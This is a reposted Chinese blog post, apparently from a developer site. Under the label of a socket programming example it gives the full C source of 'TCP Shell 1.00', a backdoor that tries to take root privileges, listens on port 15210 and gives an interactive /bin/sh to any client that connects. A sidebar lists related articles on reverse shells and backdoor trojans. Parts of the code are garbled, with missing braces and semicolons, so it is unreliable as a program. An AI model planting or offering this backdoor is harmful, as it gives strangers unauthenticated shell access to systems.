socket编程例子:TCP Shell后门

TCP Shell 1.00
最新推荐文章于 2025-03-23 00:57:40 发布
转载 最新推荐文章于 2025-03-23 00:57:40 发布 · 1.8k 阅读 · 0
文章标签:

#socket #编程 #shell #tcp #struct #stream

此博客介绍了一个简单的 TCP Shell 版本 1.00 的实现代码,该程序由 UNYUN 开发,通过监听指定端口并接受连接请求来启动 shell 会话。

 

 来源:本文出自:http://sinbad.zhoubin.com 作者: 不详 (2002-12-12 06:02:00)

很简单很容易被发现,且当作socket编程例子学习吧。

/*============================================================================= 
   TCP Shell Version 1.00 
   The Shadow Penguin Security (http://shadowpenguin.backsection.net
   Written by UNYUN (unewn4th@usa.net) 
  ============================================================================= 
*/ 
#include <signal.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <errno.h> 
#include <unistd.h> 
#include <netinet/in.h> 
#include <limits.h> 
#include <netdb.h> 
#include <arpa/inet.h> 

#define MAX_CLIENTS     5           /* Max client num    */ 
#define PORT_NUM        15210       /* Port              */ 

void    get_connection(socket_type, port, listener) 
int     socket_type; 
int     port; 
int     *listener; 

        struct sockaddr_in      address; 
        struct sockaddr_in      acc; 
        int                     listening_socket; 
        int                     connected_socket = -1
        int                     new_process; 
        int                     reuse_addr = 1
        int                     acclen=sizeof(acc); 

        memset((char *&address, 0sizeof(address)); 
        address.sin_family = AF_INET; 
        address.sin_port = htons(port); 
        address.sin_addr.s_addr = htonl(INADDR_ANY); 
        listening_socket = socket(AF_INET, socket_type, 0); 
        if (listening_socket < 0
          perror("socket"); 
          exit(1); 
        } 
        if (listener != NULL) *listener = listening_socket; 
        setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR, 
                   (void *)&reuse_addr,sizeof(reuse_addr)); 
        if (bind(listening_socket,(struct sockaddr *)&address,sizeof(address))<0 
)
          perror("bind"); 
          close(listening_socket); 
          exit(1); 
        } 
        if (socket_type == SOCK_STREAM)
          if (listen(listening_socket, MAX_CLIENTS)==-1)
            perror("listen"); 
            exit(1); 
         } 
        } 
} 
void    sock_puts(sockfd, str) 
int     sockfd; 
char    *str; 

        char    x[2000],*buf; 
        size_t  bytes_sent = 0
        int     this_write,count; 

        sprintf(x," %s",str); 
        count=strlen(x); 
        buf=x; 
        while (bytes_sent < count) 
                do 
                        this_write = write(sockfd, buf, count - bytes_sent); 
                while ( (this_write < 0&& (errno == EINTR) ); 
                if (this_write <= 0return
                bytes_sent += this_write; 
                buf += this_write; 
        } 
} 
int     main(argc, argv) 
int     argc; 
char    *argv[]; 

        void            get_connection(); 
        void            sock_puts(); 
        int             i,sz; 
        int             sock; 
        static int      listensock = -1
        struct sockaddr_in sad; 

        setuid(0); 
        setgid(0); 

        for (;;)
          get_connection(SOCK_STREAM, PORT_NUM, &listensock); 
          sz=sizeof(struct sockaddr_in); 
          for (;;)
            if ((sock=accept(listensock,(void *)&sad,&sz))==-1)
                perror("Accept"); 
                exit(1); 
            } 
            if (fork()==0)
                sock_puts(sock,"The ShadowPenguin Systems Inc. TCP Shell 1.00 De 
veloped by  

UNYUN. "); 
                for (i=0;i<3;i++)
                    close(i); dup2(sock,i); 
                } 
                execl("/bin/sh","sh","-i",0); 
                close(sock);      
                break
            } 
          } 
        } 
} 


利用socket编程实现的网络版shell命令解释器
04-30
利用socket编程实现的网络版shell命令解释器 内含两个代码包:分别用不同思路实现的
Linux socket编程实例:echo服务器程序
01-03
Linux socket编程实例:echo服务器程序
一个Socket编程例子
weixin_33964094的博客
10-26 117
#include &lt;signal.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/socket.h&gt; #include &lt;errno.h&gt; #include &amp
Socket编程实例
Code for Coffee
11-09 627
Socket 编程实例       首先介绍两个用于处理网络通信中地址问题的结构体:sockaddr和sockaddr_insockaddrstruct sockaddr { unsigned short sa_family; /* address family, AF_xxx */ char sa_data[14]; /* 14 bytes of protocol address */
shell建立socket连接
任我行的博客
12-20 5956
建立socket的两种方式 udp:/dev/udp/host/port tcp:/dev/tcp/host/port 直接重定向当前shell的一个文件描述符到对应的ip/端口: exec 8<>/dev/udp/10.0.2.15/12345 就相当于建立一个UDP socket。 发送报文: echo “” >&8 使用tcpdump抓包: 00:48:18.291...
Android反向TCP Shell连接实现远程服务器控制
其技术原理涉及多个层面的知识点,包括Android系统的架构、Linux Shell编程TCP网络通信机制、反向连接技术以及安全防护中的渗透测试概念。 首先,从Android系统架构角度来看,Android是基于Linux内核开发的操作...
Linux系统安全:反弹Shell脚本分析
在这个例子中,我们看到一个简单的C语言程序,用于创建一个反弹Shell。 首先,程序定义了几个关键变量: 1. `shell` 变量存储了要执行的系统命令,这里是 "/bin/sh",这是Linux系统的默认shell。 2. `message` 变量...
Codes3D.zip启动脚本深挖:shell_bat_powershell中隐藏后门检测的6种信号
本文围绕压缩包文件Codes3D.zip中启动脚本存在的安全风险,系统分析了Shell、Batch与PowerShell三类脚本语言的执行机制及其在恶意行为中的利用方式。重点剖析了脚本自动执行链、权限提升路径及混淆反检测技术,并...
Python脚本编程秘法:用Kali Linux自动化渗透测试
Python是一种强大的编程语言,它的简单语法和丰富的库使得开发渗透测试工具变得相对容易。渗透测试,又称为渗透攻击,是一种通过模拟黑客攻击来评估计算机系统安全漏洞的方法。Python脚本在渗透测试中的作用主要体现...
Python逆向工程必备:Shell速查表工具详解
Python是一种广泛使用的高级编程语言,其设计理念强调代码的可读性和简洁的语法。在IT行业,Python不仅用于开发各种应用程序,而且还是在安全领域,特别是在网络安全领域,Python同样扮演着重要角色。本知识点将深入...
Socket编程例子 - TCP Shell.c
无知的瞳仁 - 临时存储空间
05-22 925
/*============================================================================= TCP Shell Version 1.00 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (unewn4th@usa
Powershell语言的Socket编程
最新发布
2501_91201177的博客
03-23 917
Socket是网络通信的基本操作单元,它代表了一个终端到终端的连接。Socket可以用于不同类型的协议,如TCP和UDP。TCP是一种可靠的连接导向协议,而UDP则是一种不可靠的、无连接的协议。在Socket编程中,用户通过Socket接口来进行数据的发送和接收。本文介绍了如何使用PowerShell进行Socket编程,涵盖了TCP和UDP的基础知识及实践示例。通过创建一个TCP服务器和客户端,我们展示了如何实现简单的网络通信;
shellsocket
笔记本+学习园
12-05 2601
参考 http://www.lslnet.com/linux/dosc1/54/linux-360985.htm exec 3 echo 'GET /index.html' >&3 cat
Linux系统shell查看SOCKET情况和socket编程概述
$好记性还是要多记录$
04-18 4313
Linux系统中,查看SOCKET使用情况可以使用ss命令。 1、命令格式: ss [参数] ss [参数] [过滤] 2、命令功能: ss(Socket Statistics的缩写)命令可以用来获取 socket统计信息,此命令输出的结果类似于 netstat输出的内容,但它能显示更多更详细的 TCP连接状态的信息,且比 netstat 更快速高效。它使用了 TCP协议栈中 tcp_diag(是...
基于ICMP和TCP原理的附带后门木马的程序
L_clearlove的博客
04-10 732
基于ICMP和TCP原理的附带后门木马的程序 原理: 从原始套接字的原理我们知道,我们可用自定义某个协议,如ICMP协议,而ICMP协议的数据包又可以由我们自己定义,而且ICMP协议发送数据是以广播的特点实现的,不需要知道目的端口,就像ping程序一样,随意ping某个ip,该ip主机只要有ICMP的接收程序就会自动接收。所以我们可以在目的ip的ICMP接收程序里面注入一个可以自动连接并返回sh...
Bash Socket 编程
sealbird的专栏
02-28 430
[code="java"]Bash Socket 编程 你可以在bash中开启一个socket链接,并且传输数据。Bash有两个特殊的设备文件: • /dev/tcp/host/port - 如果hostname,和port是合法的话,bash会尝试开启一个TCP连接。 • /dev/udp/host/port - 如果hostname和port是合法的话,bash会开启一个UD...
Linux Shell脚本编程--nc命令使用详解
热门推荐
上善若水,水善利万物而不争。
08-25 3万+
linux nc命令使用详解     功能说明:功能强大的网络工具 语 法:nc [-hlnruz][-g网关...>][-G指向器数目>][-i延迟秒数>][-o输出文件>][-p通信端口>][-s来源位址>][-v...][-w超时秒数>][主机名称][通信端口...] 参 数:  -g网关>  设置路由器跃程通信网关,最丢哦可设置8个。  -G指向器数目>  设置来源路由指
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值